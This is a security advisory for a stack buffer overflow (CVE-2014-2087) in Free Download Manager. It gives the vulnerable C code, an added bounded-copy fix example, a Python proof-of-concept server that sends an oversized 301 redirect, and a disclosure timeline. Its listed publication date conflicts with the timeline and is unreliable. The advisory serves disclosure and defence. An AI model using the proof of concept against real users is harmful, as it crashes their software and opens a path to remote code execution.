ADVISORY INFORMATION

  • Product: Free Download Manager
  • Vendor URL: https://www.freedownloadmanager.org
  • Type: Stack-based Buffer Overflow [CWE-121]
  • Date found: 2014-02-20
  • Date published: 2014-02-13
  • CVSSv2 Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
  • CVE: CVE-2014-2087

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

  • Free Download Manager v3.9.3 build 1360 (latest)
  • Free Download Manager v3.8 build 1173
  • Free Download Manager v3.0 build 852

Other older versions may be affected too.

VULNERABILITY DETAILS

A stack-based buffer overflow vulnerability has been identified in the Free Download Manager.

The application parses download requests, which are added to the download queue, but does not properly validate the length of the complete download queue object when it’s removed from the queue by the user. The following function from fdm.exe (source file: Downloads_Deleted.cpp) is triggered on deletion:

void CDownloads_Deleted::UpdateDownload(int iItem)

This function reads the filename of the download object using CDownloads_Tasks::GetFileName into szFile and adds the whole URL value as a description (in brackets) via an insecure strcat() sequence to szFile during the queue deletion process.

Since the application follows HTTP 301 redirects, an attacker who controls the target HTTP server is able to send arbitrarily long filename values to exploit this flaw. If the combined string (file name plus the URL appended in brackets) exceeds the size of szFile (10000 bytes), strcat() writes past the end of the buffer.

This leads to a stack-based buffer overflow with an overwritten SEH chain or return points, resulting in remote code execution. Successful exploits can allow remote attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in a denial-of-service condition.

This vulnerability is also exploitable locally via “File->Import->Import list of downloads”.

VULNERABLE CODE PART

// Downloads_Deleted.cpp

void CDownloads_Deleted::UpdateDownload(int iItem) {

    vmsDownloadSmartPtr dld = (fsDownload*)GetItemData (iItem);
    CHAR szFile [10000];                          // fixed-size stack buffer
    CDownloads_Tasks::GetFileName (dld, szFile);  // file name copied in, no length check
    lstrcat (szFile, " (");
    lstrcat (szFile, dld->pMgr->get_URL ());      // URL appended with no bounds check
    lstrcat (szFile, ")");
    SetItemText (iItem, 0, szFile);

[..] }
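As an added example (not Free Download Manager code, and not the vendor's fix), the following portable C shows a bounded replacement for the lstrcat() sequence above: the required length is computed before anything is written, and an entry whose name plus URL would not fit in a 10000-byte buffer is rejected instead of overflowing the stack. The buffer size matches szFile; the file name, the URL and the 9000-byte redirect target in the second scenario are constructed inputs, and snprintf() stands in for the Win32 string calls.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same capacity as the szFile stack buffer in the vulnerable function. */
#define DISPLAY_BUF_SIZE 10000

/* Hardened replacement for the lstrcat() sequence: writes "<name> (<url>)"
 * into out, which holds at most cap bytes including the terminating NUL.
 * Returns true on success; returns false and leaves out empty when the
 * result would not fit, so the caller can reject or truncate the entry
 * instead of writing past the end of the buffer. */
bool build_display_name(char *out, size_t cap, const char *name, const char *url)
{
    if (out == NULL || cap == 0 || name == NULL || url == NULL)
        return false;

    /* name + " (" + url + ")" + NUL, computed before any byte is written */
    size_t need = strlen(name) + 2 + strlen(url) + 1 + 1;
    if (need > cap) {
        out[0] = '\0';
        return false;
    }

    int n = snprintf(out, cap, "%s (%s)", name, url);
    return n >= 0 && (size_t)n < cap;
}

/* Scenario 1 (constructed input): an ordinary download entry fits and is
 * formatted as expected. Returns 1 on the expected result, 0 otherwise. */
int demo_normal_entry(void)
{
    char buf[DISPLAY_BUF_SIZE];
    bool ok = build_display_name(buf, sizeof buf, "setup.exe",
                                 "http://example.invalid/setup.exe");
    return ok && strcmp(buf, "setup.exe (http://example.invalid/setup.exe)") == 0;
}

/* Scenario 2 (constructed input): a redirect target of 9000 'C' bytes, the
 * size used by the advisory's proof of concept, combined with a long file
 * name so that name + URL exceeds DISPLAY_BUF_SIZE. The bounded builder must
 * refuse rather than overflow. Returns 1 when the entry is rejected and the
 * output buffer is left empty. */
int demo_oversized_redirect(void)
{
    char *url = malloc(9001);
    if (url == NULL)
        return 0;
    memset(url, 'C', 9000);
    url[9000] = '\0';

    char name[1500];
    memset(name, 'A', sizeof name - 1);
    name[sizeof name - 1] = '\0';

    char buf[DISPLAY_BUF_SIZE];
    bool ok = build_display_name(buf, sizeof buf, name, url);
    free(url);
    return !ok && buf[0] == '\0';
}

int main(void)
{
    printf("normal entry formatted:      %s\n", demo_normal_entry() ? "yes" : "no");
    printf("oversized redirect rejected: %s\n", demo_oversized_redirect() ? "yes" : "no");
    return 0;
}
```

The design point is that the length check happens once, on the whole result, before the first write; checking each lstrcat() call separately would still let the combined string exceed the buffer. A caller that prefers to display something rather than nothing can truncate the URL to the remaining space after the check fails, but must never let the copy itself run unbounded.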

PROOF-OF-CONCEPT (PYTHON)

#!/usr/bin/python
# Python 2 syntax (print statements), as in the original proof of concept.
from socket import *
from time import sleep

host = "192.168.0.1"
port = 80

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port

cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]

# 9000-byte Location value: the resulting file name plus URL exceeds the
# 10000-byte szFile buffer once they are concatenated.
junk0 = "\x43" * 9000

payload = junk0

buffer = "HTTP/1.1 301 Moved Permanently\r\n"
buffer += "Date: Thu, 20 Feb 2014 11:31:08 GMT\r\n"
buffer += "Server: Apache/2.2.22 (Debian)\r\n"
buffer += "Location: " + payload + "\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 8000\r\n"
buffer += "Keep-Alive: timeout=5, max=100\r\n"
buffer += "Connection: Keep-Alive\r\n"
buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"
buffer += "\r\n"
buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
buffer += "<html><head>\n"
buffer += "<title>301 Moved Permanently</title>\n"
buffer += "</head><body>\n"
buffer += "<h1>Moved Permanently</h1>\n"
buffer += "<p>The document has moved <a href=\"" + payload + "\">here</a>.</p>\n"
buffer += "</body></html>\n"

print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"

sleep(1)
cl.close()
s.close()

SOLUTION

None

REPORT TIMELINE

  • 2014-02-20: Discovery of the vulnerability
  • 2014-02-21: Vendor Notification #1 with preset disclosure date (2014-03-09)
  • 2014-02-24: MITRE assigns CVE-2014-2087
  • 2014-02-25: Vendor Notification #2
  • 2014-02-26: Vendor Notification #3
  • 2014-03-05: Vendor Response
  • 2014-03-05: Vulnerability details sent to vendor
  • 2014-03-09: RCE Security asks for a status update
  • 2014-03-13: No response from vendor
  • 2014-03-13: Full Disclosure according to disclosure policy

REFERENCES